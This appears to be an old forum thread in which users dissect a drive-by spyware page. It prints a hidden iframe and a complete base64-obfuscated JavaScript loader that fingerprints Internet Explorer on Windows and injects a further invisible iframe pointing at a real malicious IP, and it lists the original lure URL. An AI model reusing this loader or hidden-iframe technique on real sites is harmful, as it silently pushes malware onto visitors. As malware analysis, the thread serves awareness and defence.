#3: A little example how Spyware tries to install itself

GENERAL CHAT
Author
alex
Good Poster
Added: Nov 28, 2004 11:57 am
I once posted this link to the Uma thread:

http://funteens.hookersex.net/TeenFunsFullSet8/index.html (don't click it!)

Calahan told me it uses an exploit to do something.

I decided to have a closer look and tell you about, so that everyone can understand what is going on.

Part 1:
Not very spectecular, simply a thumbnail galery of Uma .... mmmmhhh Very Happy .... ehh what did I want to say? .... oh yeah right .... let's have a look at the code.

it contains HTML code and Javascript. It is not well formated (contains two HTML elements) but IE and most other browsers usually don't care.

There is one special line saying

"<iframe frameborder=0 height=0 style="visibility:hidden" width=0 src="http://64.186.138.100/u/"></iframe>"

So what does it mean?

IFRAME (internal frame) is a special tag for IE. I don't know if Firefox/Opera can understand it already but they probably will in the near future. Usually it opens another HTML page within the original one. The more interessting fact are the frameborder, height and width attribute. It says that the page is opened but not displayed. To really make sure you don't see it. the style is set to hidden.

the page to open is "http://64.186.138.100/u/" . Unforunately this server doesn't allow reverse DNS lookup, so I cannot tell at once which company it is.

Part 2:

So lets look at the site it wants to open:

Code:
<script language=javascript>
<!--

var b64, f64,d;
function a(s)
{
  var i;

  for (i=0;i<s.length;i++)
        if (!s[i])
           s[i]=1;
        return s;
}

function u(d)
{
   var r=new Array;
   var i=0;

   while(i<d.length)
   {
        if (d[i]<128)
        {
            r[r.length]=String.fromCharCode(d[i]);
            i++;
        }
        else if( (d[i]>191) && (d[i]<224) )
        {
            r[r.length]=String.fromCharCode(((d[i]&31)<<6)|(d[i+1]&63));
            i+=2;
        }
        else{
            r[r.length]=String.fromCharCode(((d[i]&15)<<12)|((d[i+1]&63)<<6)|(d[i+2]&63));
            i+=3;
        }
    }
    return r.join("");
}

function t(t)
{
    var d=new Array;
    var i=0;

    t=t.replace(/\n|\r/g,"");
    t=t.replace(/=/g,"");

    while(i<t.length)
    {
        d[d.length]=(f64[t.charAt(i)]<<2)|(f64[t.charAt(i+1)]>>4);
        d[d.length]=(((f64[t.charAt(i+1)]&15)<<4)|(f64[t.charAt(i+2)]>>2));
        d[d.length]=(((f64[t.charAt(i+2)]&3)<<6)|(f64[t.charAt(i+3)]));
        i+=4;
    }

    if (t.length%4==2)
        d=d.slice(0, d.length-2);

    if (t.length%4==3)
        d=d.slice(0,d.length-1);

    return d;
}

function b(s)
{
    var b64s='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/';

    b64=[];
    f64=[];

    for(var i=0;i<b64s.length;i++)
    {
        b64[i]=b64s.charAt(i);
        f64[b64s.charAt(i)]=i;
    }
    return u(a(t(s)));
}
eval(b("dmFyIGJpa2t5ID0gZG9jdW1lbnQuY29va2llOwogIGZ1bmN0aW9uIGdldEN
vb2tpZShuYW1lKSB7IC8vIHVzZTogZ2V0Q29va2llKCJuYW1lIik7CiAgICB2
YXIgaW5kZXggPSBiaWtreS5pbmRleE9mKG5hbWUgKyAiPSIpOwogICAga
WYgKGluZGV4ID09IC0xKSByZXR1cm4gbnVsbDsKICAgIGluZGV4ID0gYml
ra3kuaW5kZXhPZigiPSIsIGluZGV4KSArIDE7IAogICAgdmFyIGVuZHN0ciA9
IGJpa2t5LmluZGV4T2YoIjsiLCBpbmRleCk7IAogICAgaWYgKGVuZHN0ciA9
PSAtMSkgZW5kc3RyID0gYmlra3kubGVuZ3RoOwogICAgcmV0dXJuIHVuZX
NjYXBlKGJpa2t5LnN1YnN0cmluZyhpbmRleCwgZW5kc3RyKSk7CiAgfSAgIA
ogIHZhciB0b2RheSA9IG5ldyBEYXRlKCk7CiAgdmFyIGV4cGlyeSA9IG5ldyB
EYXRlKHRvZGF5LmdldFRpbWUoKSArIDI4ICogMjQgKiA2MCAqIDYwICogM
TAwMCk7IC8vIHBsdXMgMjggZGF5cwogIGZ1bmN0aW9uIHNldENvb2tpZSh
uYW1lLCB2YWx1ZSkgeyAvLyB1c2U6IHNldENvb2tpZSgibmFtZSIsIHZhbHVl
KTsKICAgIGlmICh2YWx1ZSAhPSBudWxsICYmIHZhbHVlICE9ICIiKQogIC
AgICBkb2N1bWVudC5jb29raWU9bmFtZSArICI9IiArIGVzY2FwZSh2YWx1Z
SkgKyAiOyBleHBpcmVzPSIgKyBleHBpcnkudG9HTVRTdHJpbmcoKTsKICAg
IGJpa2t5ID0gZG9jdW1lbnQuY29va2llOyAvLyB1cGRhdGUgYmlra3kKICB9C
nZhciBkZXRlY3QgPSBuYXZpZ2F0b3IudXNlckFnZW50LnRvTG93ZXJDYXNlK
Ck7CmZ1bmN0aW9uIGNoZWNrSXQoc3RyaW5nKQp7CiAgICAgICAgcGxh
Y2UgPSBkZXRlY3QuaW5kZXhPZihzdHJpbmcpICsgMTsKICAgICAgICB0aG
VzdHJpbmcgPSBzdHJpbmc7CiAgICAgICAgcmV0dXJuIHBsYWNlOwp9CiAgI
CAgICAgCiAgICAgICAgdmFyIGNuYW1lPSJEQmNDIjsKICAgICAgICBpZiAo
Z2V0Q29va2llKGNuYW1lKSA9PSBudWxsICYmIGNoZWNrSXQoJ3dpbicpIC
YmIGNoZWNrSXQoJ21zaWUnKSApCiAgICAgICAgewogICAgICAgICAgICA
gICAgLy8gZmVlZAogICAgICAgICAgICAgICAgZG9jdW1lbnQud3JpdGUoJz
xpZnJhbWUgc3JjPSJodHRwOi8vNjQuMTg2LjEzOC4xMDAvdS9iLmh0bWwiIH
dpZHRoPTAgaGVpZ2h0PTAgc3R5bGU9InZpc2liaWxpdHk6ZmFsc2UiPjwva
WZyYW1lPicpOwogICAgICAgICAgICAgICAgc2V0Q29va2llKGNuYW1lLCBN
YXRoLnJhbmRvbSgpKjY1MDAwKTsKICAgICAgICB9Cg=="))

-->
</script>


This means that the writer does not serve the HTML page directly but encodes it into an array of letters (something like base64 encoding, email uses the same). This is also a trick to pass virus scanners.

By changed the eval function into alert you can see what it means decoded.
alex
Good Poster
Added: Nov 28, 2004 12:09 pm
Ok, it tries to open another IFRAME. I tried to follow this link, but my Virusscanner detected a virus. IE decided to stop working. And I don't have the time to do further research.
Calahan
Very Respected Poster
Added: Nov 28, 2004 2:22 pm
Very interesting, alex!
Thanks Very Happy

All the best,
Calahan
retro98
Poster
Added: Dec 24, 2004 8:39 pm
thanks alex but there is very little to do about it
lewbowski7
I'm probably spamming
Added: Apr 20, 2005 12:15 am
Quite educational
Cruzing
Very Respected Poster
Added: Jun 27, 2005 2:35 pm
Shocked Shocked Shocked

My Mac. whois pulled up:

OrgName:    Global Innovations, Inc.
OrgID:      GLBI
Address:    4650 Wedgewood Blvd
Address:    Suite 107
City:       Frederick
StateProv:  MD
PostalCode: 21703
Country:    US

NetRange:   64.186.128.0 - 64.186.159.255
CIDR:       64.186.128.0/19
NetName:    GLOBALI
NetHandle:  NET-64-186-128-0-1
Parent:     NET-64-0-0-0-0
NetType:    Direct Allocation
NameServer: NS1.GLOBALI.NET
NameServer: NS2.GLOBALI.NET
Comment:    ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate:    2001-08-03
Updated:    2002-09-15

OrgAbuseHandle: GIAD-ARIN
OrgAbuseName:   Global Innovations Abuse Department
OrgAbusePhone:  +1-866-276-3638
OrgAbuseEmail:  abuse@globali.net

OrgNOCHandle: GIN1-ARIN
OrgNOCName:   Global Innovations NOC
OrgNOCPhone:  +1-866-276-3638
OrgNOCEmail:  noc@globali.net

OrgTechHandle: GIN1-ARIN
OrgTechName:   Global Innovations NOC
OrgTechPhone:  +1-866-276-3638
OrgTechEmail:  noc@globali.net

# ARIN WHOIS database, last updated 2005-06-26 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.

Gota love them Mac's
dark_angel
Respected Poster
Added: Jun 27, 2005 3:23 pm
Since I'm one Linux, and don't fear IE bugs Very Happy I go for it, and try to load http://64.186.138.100/u/b.html
but it's no longer there:

Not Found
The requested URL /u/b.html was not found on this server.
Apache/2.0.50 (Unix) PHP/5.0.0 Server at 64.186.138.100 Port 80

DA
auser
Poster
Added: Jun 27, 2005 9:53 pm
thanks for the info, not that I understand it all, but any and all tips are welcome, I find the microsoft beta spyware works well, but the beta version expires next month don't know what that means, but I don't have as many problems as I use to
Cruzing
Very Respected Poster
Added: Jun 28, 2005 2:45 am
I use to like Windows, until I bought a Mac. Very Happy Very Happy Very Happy Very Happy

I was forever fixing, trouble shooting, changing modem cards, adware, spyware, ram partitions all of it........
Windows will always be a more risky system fo bad guys!
that will not change, ever!

Then I bought a Mac, everything always works, now I use it instead of fixing it!

Good Luck dude, not much more I can say.

Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool Cool